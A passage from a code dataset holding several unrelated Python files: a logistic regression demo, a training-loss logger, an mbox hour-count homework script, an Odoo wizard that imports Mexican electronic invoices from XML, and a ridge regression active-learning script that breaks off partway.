\"__main__\":\n    # load the data\n    X, Y = loadData()\n    # b is merged into w, so the input vectors are extended accordingly; w[-1] is b\n    X_data = np.hstack([X, np.ones((len(X),1))])\n    # split into training and test sets\n    train_data, test_data, train_label, test_label = train_test_split(X_data, Y, test_size=0.3)\n    clf = LogisticRegression()\n    clf.train(train_data, train_label)\n    clf.test(test_data, test_label)\n\n    # plot the data and the fitted decision boundary\n    plt.scatter(X[:50, 0], X[:50, 1], label='0')\n    plt.scatter(X[50:, 0], X[50:, 1], label='1')\n    plt.legend()\n    x_points = np.arange(4, 8)\n    y_points = -(clf.w[0]*x_points + clf.w[2])/clf.w[1]\n    plt.plot(x_points, 
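    # decision boundary: w0*x + w1*y + w2 = 0, i.e. y = -(w0*x + w2)/w1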
y_points)\n plt.show()\n\n","sub_path":"Logistic回归/logistic回归-梯度下降法.py","file_name":"logistic回归-梯度下降法.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"292099358","text":"import errno\nimport json\nimport os\nfrom datetime import datetime\nfrom statistics import mean\n\nfrom matplotlib import pyplot as plt\n\nclass Logger(object):\n def __init__(self, params, game, show=False):\n self.save_dir, self.numpy_dumps_dir, self.pickled_dir = self.save_parameters(params, game)\n self.is_remote = not show\n self.training_V_loss = []\n self.training_pi_loss = []\n\n def plot_online_return(self, online_scores):\n plt.figure()\n plt.plot(online_scores)\n plt.grid = True\n plt.title(\"Return over policy improvement episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Return\")\n plt.savefig(self.save_dir + \"/plots/return.png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n def plot_loss(self, episode, ep_V_loss, ep_pi_loss):\n plt.figure()\n plt.plot(ep_V_loss, label=\"V_loss\")\n plt.plot(ep_pi_loss, label=\"pi_loss\")\n plt.grid = True\n plt.title(\"Training loss\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Loss\")\n plt.yscale(\"log\")\n plt.legend()\n plt.savefig(self.save_dir + \"/plots//train_\" + str(episode) + \".png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n ep_pi_loss = mean(ep_pi_loss)\n ep_V_loss = mean(ep_V_loss)\n\n self.training_V_loss.append(ep_V_loss)\n self.training_pi_loss.append(ep_pi_loss)\n\n print(\"--------------------------\")\n print(\"Episode\", episode)\n print(\"pi_loss:\", ep_pi_loss)\n print(\"V_loss:\", ep_V_loss)\n print(\"--------------------------\")\n\n def plot_evaluation_mean_and_variance(self, avgs, stds, indexes=None):\n \"\"\"Plot the mean and variance with a whiskers plot\n @type avgs: list\n @type stds: list\n @type indexes: list\n \"\"\"\n if not indexes:\n indexes = [10 * i for i in range(len(avgs))]\n\n plt.figure()\n plt.errorbar(indexes, avgs, stds, linestyle='None', marker='^', capsize=3)\n plt.xlabel(\"Step of evaluation\")\n plt.ylabel(\"Return\")\n plt.title(\"Mean and variance for return in policy evaluation\")\n if not self.is_remote:\n plt.show()\n plt.savefig(self.save_dir + \"/plots/meanvariance.png\")\n plt.close()\n\n def plot_training_loss_over_time(self):\n plt.figure()\n plt.plot(self.training_V_loss, label=\"V_loss\")\n plt.plot(self.training_pi_loss, label=\"pi_loss\")\n plt.grid = True\n plt.title(\"Loss over policy improvement episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Loss\")\n plt.ylim = 3.0\n plt.legend()\n plt.savefig(self.save_dir + \"/plots/overall.png\")\n if not self.is_remote:\n plt.show()\n plt.close()\n\n def log_start(self, iteration, start_policy, start_value, start_targets):\n \"\"\"Dump data about the starting game state over a txt file\"\"\"\n\n with open(self.save_dir+\"/targets.txt\", mode=\"a\") as dump:\n dump.write(\"---- Targets at iteration \" + str(iteration) + \" ----\\n\")\n for target in start_targets:\n dump.write(str(target) + '\\n')\n\n dump.write(\"---- Start policy ----\\n\")\n for n in start_policy:\n dump.write(str(n) + \" \")\n dump.write(\"\\n\")\n\n dump.write(\"---- Start value ----\\n\")\n for n in start_value:\n dump.write(str(n) + \" \")\n dump.write(\"\\n\")\n\n dump.close()\n\n @staticmethod\n def save_parameters(params, game):\n mydir = os.path.join(\n os.getcwd(), \"logs\", game,\n datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n try:\n os.makedirs(mydir)\n 
except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"plots\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"numpy_dumps\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n try:\n os.makedirs(os.path.join(mydir, \"pickled\"))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # This was not a \"directory exist\" error..\n\n with open(os.path.join(mydir, \"parameters.txt\"), 'w') as d:\n d.write(json.dumps(params))\n\n return mydir, os.path.join(mydir, \"numpy_dumps\"), os.path.join(mydir, \"pickled\")","sub_path":"utils/logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623376181","text":"# 10.2 Write a program to read through the mbox-short.txt and figure out the distribution by hour \r\n# of the day for each of the messages. You can pull the hour out from the 'From ' line by finding \r\n# the time and then splitting the string a second time using a colon.\r\n# From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\r\n# Once you have accumulated the counts for each hour, print out the counts, sorted by hour as shown below.\r\n\r\n###################\r\n#### open file ####\r\n###################\r\nfname = input(\"Enter File:\")\r\nif len(fname) < 1: fname = \"mbox-short.txt\"\r\nhandle = open(fname)\r\n\r\n###################################################\r\n#### perform operations to create a dictionary ####\r\n###################################################\r\ndi = dict()\r\nfor lin in handle:\r\n#### identify lines that start with 'From' ####\r\n if not lin.startswith(\"From\") : continue\r\n lin = lin.rstrip() \r\n spl = lin.split()\r\n if len(spl) < 3: continue\r\n#### split line and subset out the hour ####\r\n spl = spl[5]\r\n spl = spl.split(\":\")\r\n spl = spl[0]\r\n #print(spl)\r\n#### create a dictionary and perform counts ####\r\n if spl in di:\r\n di[spl] = di[spl] + 1\r\n else:\r\n di[spl] = 1\r\n#print(di)\r\n\r\n##################################################\r\n#### Create a tuples from dictionary and sort ####\r\n##################################################\r\ntups = sorted(di.items())\r\n#print(tups)\r\n\r\n###############################################\r\n#### print out according to desired output ####\r\n###############################################\r\nfor (k, v) in tups:\r\n print(k,v)\r\n\r\n\r\n\r\n","sub_path":"2018-10-07 python data structures/46 homework 7.py","file_name":"46 homework 7.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"154548844","text":"# -*- coding: utf-8 -*-\n\nimport base64\nfrom odoo import models, fields, api, tools, _\nimport xlrd\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT, datetime, DEFAULT_SERVER_DATETIME_FORMAT, etree, defaultdict\nfrom xlrd import XLRDError\nimport logging\nfrom lxml.objectify import fromstring\nfrom odoo.addons import decimal_precision as dp\n\nEDI_NAMESPACES = {\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'cfdi': 'http://www.sat.gob.mx/cfd/3',\n 'tfd': 'http://www.sat.gob.mx/TimbreFiscalDigital',\n}\n\n\nclass 
EdiImportTax(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard.tax'\n\n import_id = fields.Many2one('l10n.mx.edi.import.wizard', required=True)\n\n name = fields.Char('Name')\n amount = fields.Float('Amount', digits=(12, 6))\n amount_rounding = fields.Float('Amount Rounding', digits=(12, 6))\n base = fields.Float('Amount Rounding', digits=(12, 6))\n manual = fields.Boolean('Manual')\n\n tax_id = fields.Many2one('account.tax', 'Tax')\n account_id = fields.Many2one('account.account', 'Account')\n company_id = fields.Many2one('res.company', 'Company')\n currency_id = fields.Many2one('res.currency', 'Currency')\n\n\nclass EdiImportLine(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard.line'\n\n import_id = fields.Many2one('l10n.mx.edi.import.wizard', required=True)\n account_analytic_id = fields.Many2one('account.analytic.account', 'Analytic Account')\n uom_code = fields.Char('Unit of Measure')\n product_code = fields.Char('Product Code')\n l10n_mx_edi_code_sat = fields.Char('SAT Code')\n has_product = fields.Boolean()\n\n product_id = fields.Many2one('product.product', 'Product', compute='_compute_product', store=True)\n product_description = fields.Char('Description')\n\n currency_id = fields.Many2one('res.currency', 'Currency')\n\n price_unit = fields.Float('Unit Price', digits=(12, 6))\n price_subtotal = fields.Float('Price', digits=(12, 6))\n price_total = fields.Float('Price', digits=(12, 6))\n total_taxes = fields.Float('Total Taxes', digits=(12, 6))\n quantity = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'), default=1)\n discount = fields.Float('Discount', digits=(12, 6))\n\n invoice_line_tax_ids = fields.Many2many('account.tax',\n 'l10n_mx_edi_import_wizard_line_tax_rel', 'invoice_line_id', 'tax_id',\n string='Taxes')\n\n def product_lookup(self):\n if self.product_code:\n product = self.env['product.product'].search([('default_code', '=', self.product_code)])\n\n return product\n\n return False\n\n @api.model\n def create(self, values):\n item = super().create(values)\n item._compute_product()\n return item\n\n @api.one\n def _compute_product(self):\n product = self.product_lookup()\n\n self.has_product = product and product.id is not False\n\n if self.has_product:\n self.product_id = product.id\n\n\ndef get_xml_value(xml, selector, key):\n if selector:\n el = xml.find(selector, EDI_NAMESPACES)\n if el:\n return el.get(key.lower(), el.get(key.capitalize()))\n else:\n xml.get(key.lower(), xml.get(key.capitalize()))\n\n\nclass EdiImport(models.TransientModel):\n _name = 'l10n.mx.edi.import.wizard'\n\n xml_file = fields.Binary(required=True)\n xml_content = fields.Text(readonly=True)\n name = fields.Char('Folio')\n\n version = fields.Char()\n\n l10n_mx_edi_usage = fields.Selection([\n ('G01', 'Acquisition of merchandise'),\n ('G02', 'Returns, discounts or bonuses'),\n ('G03', 'General expenses'),\n ('I01', 'Constructions'),\n ('I02', 'Office furniture and equipment investment'),\n ('I03', 'Transportation equipment'),\n ('I04', 'Computer equipment and accessories'),\n ('I05', 'Dices, dies, molds, matrices and tooling'),\n ('I06', 'Telephone communications'),\n ('I07', 'Satellite communications'),\n ('I08', 'Other machinery and equipment'),\n ('D01', 'Medical, dental and hospital expenses.'),\n ('D02', 'Medical expenses for disability'),\n ('D03', 'Funeral expenses'),\n ('D04', 'Donations'),\n ('D05', 'Real interest effectively paid for mortgage loans (room house)'),\n ('D06', 'Voluntary contributions to SAR'),\n ('D07', 'Medical 
insurance premiums'),\n ('D08', 'Mandatory School Transportation Expenses'),\n ('D09', 'Deposits in savings accounts, premiums based on pension plans.'),\n ('D10', 'Payments for educational services (Colegiatura)'),\n ('P01', 'To define'),\n ], 'Usage', default='P01',\n help='Used in CFDI 3.3 to express the key to the usage that will '\n 'gives the receiver to this invoice. This value is defined by the '\n 'customer. \\nNote: It is not cause for cancellation if the key set is '\n 'not the usage that will give the receiver of the document.')\n\n l10n_mx_edi_pac_status = fields.Char(default='to_sign')\n l10n_mx_edi_sat_status = fields.Char(default='none')\n l10n_mx_edi_cfdi_name = fields.Char()\n l10n_mx_edi_cfdi_uuid = fields.Char('UUID')\n l10n_mx_edi_cfdi = fields.Char(\"CFDI\")\n l10n_mx_edi_cfdi_supplier_rfc = fields.Char('RFC')\n l10n_mx_edi_cfdi_supplier_name = fields.Char('Name')\n l10n_mx_edi_cfdi_customer_rfc = fields.Char('RFC')\n l10n_mx_edi_cfdi_customer_name = fields.Char('Name')\n l10n_mx_edi_cfdi_amount = fields.Float('Amount', digits=(10, 2))\n currency_code = fields.Char('Currency Code')\n currency_id = fields.Many2one('res.currency', 'Currency', compute='_compute_edi_values', store=True)\n exchange_rate = fields.Float(string='Current Rate', digits=(12, 6))\n company_id = fields.Many2one('res.partner', 'Company', compute='_compute_edi_values', store=True)\n partner_id = fields.Many2one('res.partner', 'Client', compute='_compute_edi_values', store=True)\n partner_shipping_id = fields.Many2one('res.partner', string='Delivery Address', compute='_compute_edi_values', store=True)\n state = fields.Char(\"State\")\n date_invoice = fields.Datetime()\n payment_term_name = fields.Char(\"Payement Term\", size=255)\n has_payment_term = fields.Boolean()\n payment_term_id = fields.Many2one('account.payment.term', 'Payment Term', compute='_compute_edi_values', store=True)\n l10n_mx_edi_cfdi_certificate_id = fields.Char()\n invoice_id = fields.Many2one('account.invoice', 'Invoice')\n fiscal_position_code = fields.Char('Fiscal Position Code')\n fiscal_position_id = fields.Many2one('account.fiscal.position', 'Fiscal Position', compute='_compute_edi_values', store=True)\n\n amount_untaxed = fields.Float(string='Untaxed Amount', store=True, readonly=True, digits=(12, 6))\n amount_tax = fields.Float(string='Taxes', store=True, readonly=True, digits=(12, 6))\n amount_total = fields.Float(string='Total', store=True, readonly=True, digits=(12, 6))\n\n line_ids = fields.One2many('l10n.mx.edi.import.wizard.line', 'import_id', 'Lines')\n tax_line_ids = fields.One2many('l10n.mx.edi.import.wizard.tax', 'import_id', 'Tax Lines')\n\n @api.multi\n @api.depends('currency_code', 'payment_term_name', 'fiscal_position_code', 'l10n_mx_edi_cfdi_supplier_rfc', 'l10n_mx_edi_cfdi_customer_rfc')\n def _compute_edi_values(self):\n self.ensure_one()\n if self.fiscal_position_code:\n fiscal_position = self.env['account.fiscal.position'].search(\n [('l10n_mx_edi_code', '=', self.fiscal_position_code)], limit=1)\n self.fiscal_position_id = fiscal_position.id or False\n\n if self.payment_term_name:\n payment_term = self.env['account.payment.term'].search(\n [('name', '=', self.payment_term_name)], limit=1)\n self.payment_term_id = payment_term.id or False\n self.has_payment_term = payment_term.id is not False\n\n if self.currency_code:\n self.currency_id = self.env['res.currency'].search([('name', '=', self.currency_code)]).id\n else:\n self.currency_id = False\n\n if self.l10n_mx_edi_cfdi_supplier_rfc:\n supplier = 
self.env['res.partner'].search([('vat', '=', self.l10n_mx_edi_cfdi_supplier_rfc)], limit=1)\n\n self.company_id = supplier.company_id.id if supplier.id else False\n else:\n self.company_id = False\n\n if self.l10n_mx_edi_cfdi_customer_rfc:\n supplier = self.env['res.partner'].search([('vat', '=', self.l10n_mx_edi_cfdi_customer_rfc)], limit=1)\n\n self.partner_id = supplier.id or False\n\n if self.partner_id:\n addr = self.partner_id.address_get(['delivery'])\n self.partner_shipping_id = addr and addr.get('delivery')\n else:\n self.partner_id = False\n\n @api.multi\n def action_validate(self):\n\n if self.process_xml_file():\n preview_form = self.env.ref('l10n_mx_edi_import.l10n_mx_edi_import_wizard_preview_form')\n\n return {\n 'name': _('Preview Data'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': self.id,\n 'res_model': self._name,\n 'views': [(preview_form.id, 'form')],\n 'view_id': preview_form.id,\n 'target': 'new',\n }\n\n @api.multi\n def action_upload(self):\n upload_form = self.env.ref('l10n_mx_edi_import.l10n_mx_edi_import_wizard_form')\n\n return {\n 'name': _('Preview Data'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self._name,\n 'views': [(upload_form.id, 'form')],\n 'view_id': upload_form.id,\n 'target': 'new',\n }\n\n def validate_import(self):\n invalid = filter(lambda p: not p.product_id, self.line_ids)\n\n if len(list(invalid)):\n raise UserError(\n _('Some invoice lines doesnt have a valid product. Please update or upload another XML file.'))\n\n return True\n\n def get_invoice_tax_line_values_from_tax_line(self, line):\n\n return {\n 'name': line.name,\n 'tax_id': line.tax_id.id,\n 'account_id': line.account_id.id,\n 'company_id': line.company_id.id,\n 'currency_id': line.currency_id.id,\n 'amount': line.amount,\n 'amount_rounding': line.amount_rounding,\n 'base': line.base,\n 'manual': line.manual,\n }\n\n def get_invoice_line_values_from_line(self, line):\n ir_property_obj = self.env['ir.property']\n\n account_id = False\n if line.product_id.id:\n account_id = line.product_id.property_account_income_id.id\n\n if not account_id:\n inc_acc = ir_property_obj.get('property_account_income_categ_id', 'product.category')\n account_id = self.fiscal_position_id.map_account(inc_acc).id if inc_acc else False\n\n if not account_id:\n raise UserError(\n _(\n 'There is no income account defined for this product: \"%s\". 
You may have to install a chart of account from Accounting app, settings menu.') %\n (line.product_id.name,))\n\n return {\n 'name': line.product_description,\n 'price_unit': line.price_unit,\n 'price_subtotal': line.price_subtotal,\n 'price_subtotal_signed': line.price_subtotal,\n 'price_total': line.price_total,\n 'discount': line.discount,\n 'quantity': line.quantity,\n 'product_id': line.product_id.id,\n 'uom_id': line.product_id.uom_id.id,\n 'account_id': account_id,\n 'account_analytic_id': line.account_analytic_id.id,\n 'invoice_line_tax_ids': [(6, 0, [tax.id for tax in line.invoice_line_tax_ids])],\n }\n\n def get_invoice_creation_values(self):\n invoice_lines = []\n\n amount_untaxed = 0\n amount_untaxed_signed = 0\n amount_tax = 0\n amount_total = 0\n amount_total_signed = 0\n amount_total_company_signed = 0\n\n for line in self.line_ids:\n invoice_lines.append((0, 0, self.get_invoice_line_values_from_line(line)))\n\n amount_untaxed += line.price_subtotal\n amount_untaxed_signed += line.price_subtotal\n amount_tax += line.total_taxes\n amount_total_signed += line.price_subtotal + line.total_taxes\n amount_total_company_signed += line.price_subtotal + line.total_taxes\n\n amount_total = amount_untaxed + self.amount_tax\n\n tax_lines = []\n for line in self.tax_line_ids:\n tax_lines.append((0, 0, self.get_invoice_tax_line_values_from_tax_line(line)))\n\n return {\n 'type': 'out_invoice',\n 'state': 'draft',\n 'reference': False,\n 'move_name': \"F-/{name}\".format(name=self.name),\n 'number': \"F-/{name}\".format(name=self.name),\n 'date_invoice': self.date_invoice,\n 'partner_shipping_id': self.partner_shipping_id.id,\n 'l10n_mx_edi_usage': self.l10n_mx_edi_usage,\n 'l10n_mx_edi_pac_status': self.l10n_mx_edi_pac_status,\n 'l10n_mx_edi_sat_status': self.l10n_mx_edi_sat_status,\n 'l10n_mx_edi_cfdi_supplier_rfc': self.l10n_mx_edi_cfdi_supplier_rfc,\n 'l10n_mx_edi_cfdi_customer_rfc': self.l10n_mx_edi_cfdi_customer_rfc,\n 'account_id': self.partner_id.property_account_receivable_id.id,\n 'partner_id': self.partner_id.id,\n 'invoice_line_ids': invoice_lines,\n 'tax_line_ids': tax_lines,\n 'currency_id': self.currency_id.id,\n 'payment_term_id': self.payment_term_id.id,\n 'fiscal_position_id': self.fiscal_position_id.id if self.fiscal_position_id else self.partner_id.property_account_position_id.id,\n 'user_id': self.env.user.id,\n 'comment': '',\n\n 'amount_untaxed': amount_untaxed,\n 'amount_untaxed_signed': amount_untaxed_signed,\n 'amount_tax': self.amount_tax or amount_tax,\n 'amount_total': amount_total,\n 'amount_total_signed': amount_total_signed,\n 'amount_total_company_signed': amount_total_company_signed,\n }\n\n def create_invoice(self):\n inv_obj = self.env['account.invoice']\n invoice = inv_obj.create(self.get_invoice_creation_values())\n\n filename = ('%s-%s-MX-Invoice-%s.xml' % (\n invoice.journal_id.code, invoice.number, self.version.replace('.', '-'))).replace('/', '')\n ctx = self.env.context.copy()\n ctx.pop('default_type', False)\n invoice.l10n_mx_edi_cfdi_name = filename\n\n attachment_id = self.env['ir.attachment'].with_context(ctx).create({\n 'name': filename,\n 'res_id': invoice.id,\n 'res_model': invoice._name,\n 'datas': self.xml_file,\n 'datas_fname': filename,\n 'description': 'Mexican invoice',\n })\n\n self.invoice_id = invoice.id\n\n invoice.action_invoice_open()\n\n return invoice\n\n @api.multi\n def action_import(self):\n # create invoice here\n\n if self.validate_import():\n\n self.create_invoice()\n\n return self.do_finish_action()\n\n def 
do_finish_action(self):\n if self.invoice_id.id or True:\n action = self.env.ref('account.action_invoice_tree1').read()[0]\n\n action['views'] = [(self.env.ref('account.invoice_form').id, 'form')]\n action['res_id'] = self.invoice_id.id\n else:\n action = {'type': 'ir.actions.act_window_close'}\n return action\n\n @api.multi\n def process_xml_file(self):\n try:\n xml = fromstring(base64.b64decode(self.xml_file))\n self.xml_content = etree.tostring(xml, pretty_print=True)\n except:\n raise ValidationError('Unable to parse XML file')\n\n self.version = xml.attrib.get('Version')\n self.name = xml.attrib.get('Folio')\n self.date_invoice = datetime.strptime(xml.attrib.get('Fecha'), '%Y-%m-%dT%H:%M:%S') if xml.attrib.get('Fecha') else False\n self.currency_code = xml.attrib.get('Moneda')\n self.exchange_rate = xml.attrib.get('TipoCambio', 1)\n self.l10n_mx_edi_cfdi_amount = float(xml.attrib.get('Total', xml.attrib.get('total', 0)))\n\n self.amount_untaxed = float(xml.attrib.get('SubTotal', xml.attrib.get('subTotal', 0)))\n self.amount_total = float(xml.attrib.get('Total', xml.attrib.get('total', 0)))\n\n taxes_section = getattr(xml, 'Impuestos', False)\n if taxes_section:\n self.amount_tax = float(taxes_section.attrib.get('TotalImpuestosTrasladados', 0))\n\n self.payment_term_name = xml.attrib.get('CondicionesDePago') or ''\n\n self.l10n_mx_edi_cfdi_supplier_name = xml.Emisor.attrib.get('Nombre', xml.Emisor.attrib.get('nombre'))\n self.l10n_mx_edi_cfdi_supplier_rfc = xml.Emisor.attrib.get('Rfc', xml.Emisor.attrib.get('rfc'))\n self.l10n_mx_edi_cfdi_customer_name = xml.Receptor.attrib.get('Nombre', xml.Receptor.attrib.get('nombre'))\n self.l10n_mx_edi_cfdi_customer_rfc = xml.Receptor.attrib.get('Rfc', xml.Receptor.attrib.get('rfc'))\n self.l10n_mx_edi_usage = xml.Receptor.attrib.get('UsoCFDI')\n\n if not self.company_id:\n raise UserError(\n _('Unable to find company %s with RFC %s') % (\n self.l10n_mx_edi_cfdi_supplier_name, self.l10n_mx_edi_cfdi_supplier_rfc))\n\n if self.company_id.id != self.env.user.partner_id.company_id.id:\n raise UserError(\n _('Unable to process XML from company other than \"%s\" with RFC \"%s\". 
Invoice RFC: \"%s\".') % (\n self.env.user.partner_id.company_id.name, self.env.user.partner_id.company_id.vat, self.company_id.vat))\n\n if not self.partner_id:\n raise UserError(\n _('Unable to find client \"%s\" with RFC \"%s\".') % (\n self.l10n_mx_edi_cfdi_customer_name, self.l10n_mx_edi_cfdi_customer_rfc))\n\n complemento_section = getattr(xml, 'Complemento', False)\n\n timbre = complemento_section.find('tfd:TimbreFiscalDigital', EDI_NAMESPACES) if complemento_section else False\n\n if timbre is not None:\n self.l10n_mx_edi_cfdi_uuid = timbre.get('UUID')\n\n if self.l10n_mx_edi_cfdi_uuid:\n self.l10n_mx_edi_pac_status = 'signed'\n self.l10n_mx_edi_sat_status = 'valid'\n\n concepts_section = getattr(xml, 'Conceptos', False)\n\n if concepts_section:\n\n taxes = {}\n\n lines = []\n for i in range(concepts_section.countchildren()):\n item = concepts_section.Concepto[i]\n line = self._get_invoice_line_from_xml(item)\n\n tax_info = line.pop('tax_lines')\n\n for tline in tax_info:\n tax_item = tline['tax']\n\n if tax_item.id not in taxes:\n taxes[tax_item.id] = {\n 'name': tax_item.name,\n 'tax_id': tax_item.id,\n 'account_id': tax_item.account_id.id,\n 'currency_id': self.currency_id,\n 'company_id': self.env.user.partner_id.company_id.id,\n 'amount': tline['amount'],\n 'base': self.amount_untaxed,\n 'manual': True,\n }\n else:\n taxes[tline['tax'].id]['amount'] += tline['amount']\n\n lines.append((0, 0, line))\n\n self.line_ids = lines\n self.tax_line_ids = [(0, 0, item) for item in taxes.values()]\n\n return True\n\n def _get_invoice_line_from_xml(self, item):\n AccountTax = self.env['account.tax']\n\n tax_ids = []\n taxes = []\n total_taxes = 0\n if self.version == '3.3':\n if hasattr(item, 'Impuestos'):\n if hasattr(item.Impuestos, 'Traslados'):\n for tIndex in range(item.Impuestos.Traslados.countchildren()):\n\n concept_tax_section = getattr(item, 'Impuestos')\n\n if concept_tax_section:\n tax = concept_tax_section.Traslados.Traslado[0]\n if tax.attrib.get('TasaOCuota'):\n\n tasa = float(tax.attrib['TasaOCuota']) * 100\n amount = float(tax.attrib.get('Importe', 0))\n total_taxes += amount\n\n tax_item = AccountTax.search([('amount', '=', tasa), ('type_tax_use', '=', 'sale')], limit=1)\n\n if tax_item.id:\n tax_ids.append(tax_item.id)\n\n taxes.append({\n 'type': 'tax',\n 'item': item,\n 'tax': tax_item,\n 'amount': amount\n })\n else:\n raise UserError(\n _(\n 'Unable to find tax for %s %%') % ( tasa,))\n\n if hasattr(item.Impuestos, 'Retenciones'):\n for tIndex in range(item.Impuestos.Retenciones.countchildren()):\n\n concept_tax_section = getattr(item, 'Impuestos')\n\n if concept_tax_section:\n tax = concept_tax_section.Retenciones.Retencion[0]\n if tax.attrib.get('TasaOCuota'):\n\n tasa = float(tax.attrib['TasaOCuota']) * 100\n amount = float(tax.attrib.get('Importe', 0))\n total_taxes += amount\n\n tax_item = AccountTax.search([('amount', '=', -tasa), ('type_tax_use', '=', 'sale')],\n limit=1)\n\n if tax_item.id:\n tax_ids.append(tax_item.id)\n\n taxes.append({\n 'type': 'retention',\n 'item': item,\n 'tax': tax_item,\n 'amount': -amount\n })\n else:\n raise UserError(\n _(\n 'Unable to find retention for %s %%') % ( tasa,))\n\n price_subtotal = float(item.attrib.get('Importe', item.attrib.get('importe', 0)))\n quantity = float(item.attrib.get('Cantidad', item.attrib.get('cantidad', 0)))\n price_unit = float(item.attrib.get('ValorUnitario', item.attrib.get('valorUnitario', 0)))\n\n line = {\n 'import_id': self.id,\n 'uom_code': item.attrib.get('ClaveUnidad', 
item.attrib.get('Unidad')),\n 'l10n_mx_edi_code_sat': item.attrib.get('ClaveProdServ'),\n 'product_code': item.attrib.get('NoIdentificacion'),\n 'quantity': quantity,\n 'price_unit': price_unit,\n 'price_subtotal': price_subtotal,\n 'price_total': price_subtotal + total_taxes,\n 'total_taxes': total_taxes,\n 'currency_id': self.currency_id,\n 'tax_lines': taxes,\n 'discount': 0,\n 'product_description': item.attrib.get('Descripcion', item.attrib.get('descripcion', False)),\n 'invoice_line_tax_ids': [(6, 0, tax_ids)],\n }\n\n return line\n","sub_path":"l10n_mx_edi_import/wizard/l10n_mx_edi_import_wizard.py","file_name":"l10n_mx_edi_import_wizard.py","file_ext":"py","file_size_in_byte":24322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"41979664","text":"\nimport csv \nimport sys\nimport numpy as np\nnp.set_printoptions(precision=15)\n\n# Not utilised\n#def normalizeData(data):\n# mean = data[:,0:-1].mean(axis=0)\n# std = data[:,0:-1].std(axis=0)\n# data[:,0:-1] = data[:,0:-1] - mean[None,:]\n# data[:,0:-1] = data[:,0:-1]/std[None,:]\n# \n#def normalizeLabel(label):\n# mean = label.mean(axis=0)\n# label = label - mean\n \ndef part1(lambdaNum, varNum, data, label):\n #Lecture 3, Slide 16\n dim = data.shape[1]\n temp1 = lambdaNum*np.eye(dim) + (data.T).dot(data)\n wRR = (np.linalg.inv(temp1)).dot((data.T).dot(label))\n \n return wRR\n \ndef updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr):\n #Lecture 5, Slide 16\n oldAutoCorr = (data.T).dot(data) + oldAutoCorr\n oldCrossCorr = (data.T).dot(label) + oldCrossCorr\n\n covInv = lambdaNum*np.eye(dim) + (1/varNum)*oldAutoCorr\n cov = np.linalg.inv(covInv)\n \n temp1 = lambdaNum*varNum*np.eye(dim) + oldAutoCorr\n mean = (np.linalg.inv(temp1)).dot(oldCrossCorr)\n\n return cov, mean, oldAutoCorr, oldCrossCorr\n \ndef part2(lambdaNum, varNum, data, label, dataTest): \n dim = data.shape[1]\n active = []\n oldAutoCorr = np.zeros((dim,dim))\n oldCrossCorr = np.zeros(dim)\n\n cov, mean, oldAutoCorr, oldCrossCorr = updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr)\n #Lecture 5, slide 9\n wRR = mean\n \n #1-based indexes\n indices = list(range(dataTest.shape[0]))\n for i in range(0,10):\n #Lecture 5, Slide 18\n varMatrix = (dataTest.dot(cov)).dot(dataTest.T)\n row = np.argmax(varMatrix.diagonal())\n data = dataTest[row,:]\n# print(varMatrix[row,row])\n #Lecture 5, slide 12\n label = data.dot(wRR) \n #Build active learning sequence\n actualRow = indices[row]\n active.append(actualRow)\n #Remove x0 and corresponding index\n dataTest = np.delete(dataTest,(row),axis=0)\n indices.pop(row)\n #Update posterior distribution\n cov, mean, oldAutoCorr, oldCrossCorr = updatePosterior(lambdaNum, varNum, data, dim, label, oldAutoCorr, oldCrossCorr)\n \n #Lecture 5, slide 9\n wRR = mean\n\n #1-based indexes to pass Vocareum \n active = [j+1 for j in active] \n return active\n \ndef main(): \n lambdaNum = float(sys.argv[1])\n varNum = float(sys.argv[2])\n file_X_train = np.genfromtxt(sys.argv[3], delimiter=',')\n file_y_train = np.genfromtxt(sys.argv[4], delimiter=',')\n file_X_test = np.genfromtxt(sys.argv[5], delimiter=',')\n \n #Normalize data and label\n# normalizeData(file_X_train)\n# normalizeLabel(file_y_train)\n# normalizeData(file_X_test)\n\n #Compute wRR for part 1\n wRR = part1(lambdaNum, varNum, file_X_train, file_y_train)\n# print(wRR)\n \n #Compute active learning sequence for part 2\n active = part2(lambdaNum, varNum, file_X_train, 
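    # a copy keeps file_X_test intact while part2() whittles down its candidate pool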
